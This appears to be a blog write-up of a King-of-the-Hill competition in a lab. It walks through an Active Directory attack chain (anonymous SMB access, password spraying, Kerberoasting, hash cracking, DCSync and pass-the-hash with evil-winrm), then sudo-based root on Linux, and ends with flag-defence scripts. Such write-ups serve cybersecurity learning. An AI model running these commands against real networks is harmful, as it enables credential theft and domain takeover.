1. Overview of the Competition

This KOTH competition was a purple team event set up by the amazing Cal Poly Swift. Competitors would log in remotely to a Kali machine to attack 6 machines, gain root, plant their flag, and defend their flags and services from other hackers trying to plant theirs.

Due to us not having direct access to the environment, we had to use SSH tunneling to access things like the websites, set up BloodHound, and more.

image

This was the competition environment; each machine had a scored service which was either WinRM (port 5895/5896) or SSH (port 22). This amounted to 6 total scored services.

In order to get scored, you had to keep your services running and secured while maintaining your flag in one of the specified file locations:

  • Linux: /root/flag.txt
  • Windows: \Users\Administrator\Desktop\flag.txt

Also, for the sake of fun, you couldn’t change the root/Administrator password!

There were also trivia questions that would give us points if we answered them correctly and fast enough.

At the start, I went ahead and tried to gain access to a Linux machine. However, after the first hour, I switched to Windows, so I will go over my attack path for Windows first.

Attacking Windows

To start off with Windows, I performed an Nmap scan to see what ports were open.

nmap -sC -sV -T5 10.109.124.214

Screenshot 2025-12-01 000733

In this screenshot, I was able to see that LDAP and Kerberos were open, as well as the domain name, which we needed for our first trivia question.

At this point, I was stuck because I thought I needed credentials to get any useful information out of the services. That was until Trivia Question 2!

image

This question allowed me to finally start chipping away at Windows.

First, I ran this command to find all SMB shares on the machine:

smbclient -L 10.109.124.232

image

After getting a look at the shares, I instantly suspected that Data was the share with plaintext credentials, so I used the following command to log in. When I logged in, I found the file and sent it to my home directory with these two commands:

smbclient //10.109.124.232/Data -N
ls
get creds.txt

image

Finally, after I retrieved the file, I obtained my credentials.

image

With these credentials, I was able to set up a password spray attack to see what accounts worked.

nxc smb 10.109.124.214 10.109.124.241 10.109.124.232 -u users.txt -p passwords.txt

image

After I found a valid login, I used it to perform a Kerberoast attack on the Domain Controller (since Kerberos was open).

impacket-GetUserSPNs -request -dc-ip 10.109.124.214 kingofthehill.local/ghostadmin:Resurrect1 > output.txt

image

Now that I had the Kerberos hashes, it was time to crack them with Hashcat.

hashcat -a 0 output.txt /usr/share/wordlists/rockyou.txt.gz

image

image

With my new credentials, I went ahead and ran nxc again to see what I could do with them.

nxc smb 10.109.124.214 10.109.124.241 10.109.124.232 -u peggy -p password2

Screenshot 2025-12-04 014258

This was good news. The (Pwn3d!) text meant that my account had some sort of admin privileges, and in this case, my new account was a Domain Admin.

With these credentials, I performed a DCSync attack on the Domain Controller so I could get a dump of all NTLM hashes.

impacket-secretsdump kingofthehill.local/peggy:password2@10.109.124.214 -just-dc

image

NTLM hashes are special; instead of using Hashcat to find the admin password, you can use something called Pass-The-Hash to log in as Administrator. We will be doing that with evil-winrm.

evil-winrm -i 10.109.124.214 -u Administrator -H 5c5aefbcab1053c010bc9c1cfcc6f95d

image

Defending Windows

Once I gained admin access, I had to plant my flag and secure the machine so other hackers couldn’t steal it. At first, I used a simple echo command and pushed the output into the flag. Eventually, an attacker stole my box, so I wrote a looping PowerShell script that would: check if the file was there, put it back if missing, and make it Read-Only/Hidden.

echo "FLAG-S3X7Q5K8M2T9R4BL" > C:\Users\Administrator\Desktop\flag.txt
# ------------------------------------
$flag = "FLAG-S3X7Q5K8M2T9R4BL"
$path = "C:\Users\Administrator\Desktop\flag.txt"

while($true) {
    # Check if the file content has changed
    $current = Get-Content $path -ErrorAction SilentlyContinue
    if ($current -ne $flag) {
        # If changed/deleted, write it back immediately
        echo $flag > $path
        # Lock it (Read-only + Hidden)
        attrib +r +h $path
        Write-Host "Flag restored!"
    }
    Start-Sleep -Seconds 2
}

image

Somehow the attacker was still able to steal my flag, and I had to figure out a way to get it back. One thing I knew is that we couldn’t delete files, so the only way was to overwrite it. My script was partially flawed, but for a quick fix, I just removed the attributes and then ran my script again.

attrib -r -h -s C:\Users\Administrator\Desktop\flag.txt

image

After that, I changed the passwords of the Domain Admin accounts that I used to get the NTLM hash. Since I couldn’t change the Administrator password, I had to remediate my path to admin so no one else could use it.

net user peggy SUPER_L0NG_PASS123!
# Checking if the hash dump still works (it shouldn't):
impacket-secretsdump kingofthehill.local/peggy:password2@10.109.124.214

image

image

Finally, when that was over, I went ahead and did the same on the remaining Windows machines.

image

Attacking Linux

After I claimed all of the Windows boxes, I thought about using some of the credentials that I gained from the Windows machines, and luckily, I got a hit! But soon after I logged in, I got kicked off by the person defending the machine.

image

image

At that point, I decided to log back in and try to get LinPEAS (a Linux privilege escalation tool) running.

wget [https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh](https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh)
chmod +x linpeas.sh
./linpeas.sh

While it was running, I found that the sudoers file was misconfigured, so I was able to run admin credentials without an admin password.

image

This was because of (ALL : ALL) NOPASSWD: ALL. This meant that everyone could run sudo without valid access, and with that, I did sudo bash to become root.

image

Defending Linux

When I gained admin access, I planted my flag using:

echo "flag" > /root/flag.txt

I then made it immutable with:

chattr +i /root/flag.txt

However, I forgot to kick the current user out of the session and then got locked out myself.

image

Before I got locked out, I used the w or who command to see who was logged into the machine. I saw bobby (the user I used to gain root) and pr0pane3. The plan from then on was to get access to another machine and remove the current user from the system.

image

I was able to use the bobby user to log into hankcore via SSH. Once in, I privilege escalated to root using sudo bash just like I did on the previous machine.

Upon checking the active users with the who command, I spotted a rival hacker named gary who was actively logged in on multiple terminals (pts/1 and pts/2).

image

I immediately attempted to remove his account using userdel gary, but the command failed because he had active processes running. To fix this, I went into “Incident Response” mode and used pkill -9 to forcefully terminate his specific TTY sessions and process IDs. Once his connections were severed, I was free to delete his account and secure the box.

Conclusion

In the end, these were the machines that I had under my control.

Screenshot 2025-11-30 190122

This was the most that I had at one time.

image

Overall, I ended in 2nd place and had a great time competing in such a unique and fun competition.

<
Previous Post
Cyber-Tech-Ubuntu-Practice-image-write-up
>
Blog Archive
Archive of all previous blog posts